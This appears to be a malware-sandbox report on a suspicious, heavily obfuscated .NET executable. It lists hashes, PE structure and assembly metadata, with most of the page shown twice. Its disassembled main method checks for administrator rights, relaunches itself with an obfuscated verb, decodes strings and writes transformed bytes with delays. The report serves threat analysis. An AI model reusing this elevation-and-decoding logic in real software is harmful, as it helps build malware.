Suspicious
Suspect

588276ecb80a9d785bb64c2ab8a54229

PE Executable
|
MD5: 588276ecb80a9d785bb64c2ab8a54229
|
Size: 2.76 MB
|
application/x-dosexec

Summary by MalvaGPT
Characteristics

Symbol Obfuscation Score

Very high

Hash
 Hash Value
MD5
588276ecb80a9d785bb64c2ab8a54229
Sha1
3e679bb523c6bc1cd9045a39ae5b62fdef404c46
Sha256
6d58aefc8df90394a08e40b717146de9ecca92e87b667f14e33c13cfb6ca3e09
Sha384
6d555232cb04b7356c4ae7d52a5a8c47993d988ed00d6022819d66855b6975a8743050a29d7899d180cc023b00ad919c
Sha512
4e60ce2f1c9eb010eedeb7faf47d226733ecc5751178d465a2c65dd030966248e754a5a1fadd2d63397ef258f52e17adf9811e6ed202b4f438d9b0aea6f7d6ab
SSDeep
49152:T86fOJvA7AdP+0EFlYRguMAadRNxYeS9HrnaJ9qoN4Qov+/z6d4GGPO3:A6fOJuumTOguOjY79HuX9t/z6dJ
TLSH
59D5184C7E43C960E2D42A3420E98FF96E8A1FDBD372B0467FD83A8165A7C1ACD94D54

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
File Structure
588276ecb80a9d785bb64c2ab8a54229
[Authenticode]_b90f8885.p7b
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_ICON
ID:0001
ID:0
ID:0002
ID:0
ID:0003
ID:0
ID:0004
ID:0
RT_GROUP_CURSOR4
ID:0001
ID:0
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
hyZYVXHWcn
Informations
Name
 Value
Info

PE Detect: PeReader OK (file layout)
Info

Authenticode present at 0x29DE00 size 14632 bytes
Module Name

WYigSWmryaBxUq
Full Name

WYigSWmryaBxUq
EntryPoint

System.Void qUbzDlnPcWCACM.PwJTUYPjczDUlvY.wxkSYGdDOuEAYzQ::oGcthBeOPlXOOw(System.String[])
Scope Name

WYigSWmryaBxUq
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

nFMMzxCpTQTmgD
Assembly Version

175.123.251.167
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

.NETFramework,Version=v4.5
Total Strings

271
Main Method

System.Void qUbzDlnPcWCACM.PwJTUYPjczDUlvY.wxkSYGdDOuEAYzQ::oGcthBeOPlXOOw(System.String[])
Main IL Instruction Count

82
Main IL

call System.Void roSclhmMKGWACMe.OQchlUjKmBVMLo::SQGRfMOllodJOf() call System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent() newobj System.Void System.Security.Principal.WindowsPrincipal::.ctor(System.Security.Principal.WindowsIdentity) ldc.i4 451 ldc.i4.s -93 sub <null> callvirt System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole) brtrue.s IL_005A: call System.String System.Runtime.InteropServices.RuntimeEnvironment::GetRuntimeDirectory() call System.Diagnostics.Process System.Diagnostics.Process::GetCurrentProcess() callvirt System.Diagnostics.ProcessModule System.Diagnostics.Process::get_MainModule() callvirt System.String System.Diagnostics.ProcessModule::get_FileName() stloc.2 <null> nop <null> ldloc.2 <null> newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String) dup <null> ldstr GoSRZWUwmWKXNg call System.String DIVSteqjNPHKiv.xumfnVbWRNdakh::CNfpiBrZUmjfmw(System.String) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Verb(System.String) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) pop <null> ldc.i4.s -76 ldc.i4.s -76 sub <null> call System.Void System.Environment::Exit(System.Int32) leave.s IL_002E: nop pop <null> leave.s IL_002E: nop call System.String System.Runtime.InteropServices.RuntimeEnvironment::GetRuntimeDirectory() newobj System.Void System.Random::.ctor() ldc.i4.s 49 ldc.i4.s 47 sub <null> callvirt System.Int32 System.Random::Next(System.Int32) ldc.i4.s -3 ldc.i4.s -4 sub <null> beq.s IL_0081: ldstr "EqyWHVHyBYOCejO" ldstr qPhcXFuThoFtAui call System.String DIVSteqjNPHKiv.xumfnVbWRNdakh::CNfpiBrZUmjfmw(System.String) br.s IL_008B: call System.String System.String::Concat(System.String,System.String) ldstr EqyWHVHyBYOCejO call System.String DIVSteqjNPHKiv.xumfnVbWRNdakh::CNfpiBrZUmjfmw(System.String) call System.String System.String::Concat(System.String,System.String) ldstr uShnCyJKMUkdUcU call System.String DIVSteqjNPHKiv.xumfnVbWRNdakh::CNfpiBrZUmjfmw(System.String) call System.Byte[] qUbzDlnPcWCACM.PwJTUYPjczDUlvY.PRYFyYDvTWCmiO::RXlsYyOGqdOSTmA(System.String) call System.Text.Encoding System.Text.Encoding::get_ASCII() ldstr EZFhPKcVHibyqr call System.String DIVSteqjNPHKiv.xumfnVbWRNdakh::CNfpiBrZUmjfmw(System.String) callvirt System.Byte[] System.Text.Encoding::GetBytes(System.String) stloc.0 <null> ldloc.0 <null> call System.Byte[] qUbzDlnPcWCACM.PwJTUYPjczDUlvY.ZxFOteTBKicjGj::SIYDcPstHQIcre(System.Byte[],System.Byte[]) stloc.1 <null> dup <null> ldloc.1 <null> call System.Boolean JvYPdewvcZQXfEm.GLjNTTsGeWRGMny.aSJewDLkhBySpAD::NMosXIPZlmzQqb(System.String,System.Byte[]) pop <null> ldc.i4.s 68 ldc.i4.s -32 sub <null> call System.Threading.Tasks.Task System.Threading.Tasks.Task::Delay(System.Int32) pop <null> dup <null> ldloc.1 <null> call System.Boolean JvYPdewvcZQXfEm.GLjNTTsGeWRGMny.aSJewDLkhBySpAD::NMosXIPZlmzQqb(System.String,System.Byte[]) pop <null> ldc.i4.3 <null> ldc.i4.s -97 sub <null> call System.Threading.Tasks.Task System.Threading.Tasks.Task::Delay(System.Int32) pop <null> ldloc.1 <null> call System.Boolean JvYPdewvcZQXfEm.GLjNTTsGeWRGMny.aSJewDLkhBySpAD::NMosXIPZlmzQqb(System.String,System.Byte[]) pop <null> ldc.i4 197 ldc.i4.s 97 sub <null> call System.Threading.Tasks.Task System.Threading.Tasks.Task::Delay(System.Int32) pop <null> ret <null>
Module Name

WYigSWmryaBxUq
Full Name

WYigSWmryaBxUq
EntryPoint

System.Void qUbzDlnPcWCACM.PwJTUYPjczDUlvY.wxkSYGdDOuEAYzQ::oGcthBeOPlXOOw(System.String[])
Scope Name

WYigSWmryaBxUq
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

nFMMzxCpTQTmgD
Assembly Version

175.123.251.167
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

.NETFramework,Version=v4.5
Total Strings

271
Main Method

System.Void qUbzDlnPcWCACM.PwJTUYPjczDUlvY.wxkSYGdDOuEAYzQ::oGcthBeOPlXOOw(System.String[])
Main IL Instruction Count

82
Main IL

call System.Void roSclhmMKGWACMe.OQchlUjKmBVMLo::SQGRfMOllodJOf() call System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent() newobj System.Void System.Security.Principal.WindowsPrincipal::.ctor(System.Security.Principal.WindowsIdentity) ldc.i4 451 ldc.i4.s -93 sub <null> callvirt System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole) brtrue.s IL_005A: call System.String System.Runtime.InteropServices.RuntimeEnvironment::GetRuntimeDirectory() call System.Diagnostics.Process System.Diagnostics.Process::GetCurrentProcess() callvirt System.Diagnostics.ProcessModule System.Diagnostics.Process::get_MainModule() callvirt System.String System.Diagnostics.ProcessModule::get_FileName() stloc.2 <null> nop <null> ldloc.2 <null> newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String) dup <null> ldstr GoSRZWUwmWKXNg call System.String DIVSteqjNPHKiv.xumfnVbWRNdakh::CNfpiBrZUmjfmw(System.String) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Verb(System.String) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) pop <null> ldc.i4.s -76 ldc.i4.s -76 sub <null> call System.Void System.Environment::Exit(System.Int32) leave.s IL_002E: nop pop <null> leave.s IL_002E: nop call System.String System.Runtime.InteropServices.RuntimeEnvironment::GetRuntimeDirectory() newobj System.Void System.Random::.ctor() ldc.i4.s 49 ldc.i4.s 47 sub <null> callvirt System.Int32 System.Random::Next(System.Int32) ldc.i4.s -3 ldc.i4.s -4 sub <null> beq.s IL_0081: ldstr "EqyWHVHyBYOCejO" ldstr qPhcXFuThoFtAui call System.String DIVSteqjNPHKiv.xumfnVbWRNdakh::CNfpiBrZUmjfmw(System.String) br.s IL_008B: call System.String System.String::Concat(System.String,System.String) ldstr EqyWHVHyBYOCejO call System.String DIVSteqjNPHKiv.xumfnVbWRNdakh::CNfpiBrZUmjfmw(System.String) call System.String System.String::Concat(System.String,System.String) ldstr uShnCyJKMUkdUcU call System.String DIVSteqjNPHKiv.xumfnVbWRNdakh::CNfpiBrZUmjfmw(System.String) call System.Byte[] qUbzDlnPcWCACM.PwJTUYPjczDUlvY.PRYFyYDvTWCmiO::RXlsYyOGqdOSTmA(System.String) call System.Text.Encoding System.Text.Encoding::get_ASCII() ldstr EZFhPKcVHibyqr call System.String DIVSteqjNPHKiv.xumfnVbWRNdakh::CNfpiBrZUmjfmw(System.String) callvirt System.Byte[] System.Text.Encoding::GetBytes(System.String) stloc.0 <null> ldloc.0 <null> call System.Byte[] qUbzDlnPcWCACM.PwJTUYPjczDUlvY.ZxFOteTBKicjGj::SIYDcPstHQIcre(System.Byte[],System.Byte[]) stloc.1 <null> dup <null> ldloc.1 <null> call System.Boolean JvYPdewvcZQXfEm.GLjNTTsGeWRGMny.aSJewDLkhBySpAD::NMosXIPZlmzQqb(System.String,System.Byte[]) pop <null> ldc.i4.s 68 ldc.i4.s -32 sub <null> call System.Threading.Tasks.Task System.Threading.Tasks.Task::Delay(System.Int32) pop <null> dup <null> ldloc.1 <null> call System.Boolean JvYPdewvcZQXfEm.GLjNTTsGeWRGMny.aSJewDLkhBySpAD::NMosXIPZlmzQqb(System.String,System.Byte[]) pop <null> ldc.i4.3 <null> ldc.i4.s -97 sub <null> call System.Threading.Tasks.Task System.Threading.Tasks.Task::Delay(System.Int32) pop <null> ldloc.1 <null> call System.Boolean JvYPdewvcZQXfEm.GLjNTTsGeWRGMny.aSJewDLkhBySpAD::NMosXIPZlmzQqb(System.String,System.Byte[]) pop <null> ldc.i4 197 ldc.i4.s 97 sub <null> call System.Threading.Tasks.Task System.Threading.Tasks.Task::Delay(System.Int32) pop <null> ret <null>
588276ecb80a9d785bb64c2ab8a54229 (2.76 MB)
File Structure
588276ecb80a9d785bb64c2ab8a54229
[Authenticode]_b90f8885.p7b
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_ICON
ID:0001
ID:0
ID:0002
ID:0
ID:0003
ID:0
ID:0004
ID:0
RT_GROUP_CURSOR4
ID:0001
ID:0
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
hyZYVXHWcn
Characteristics
No malware configuration were found at this point.
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙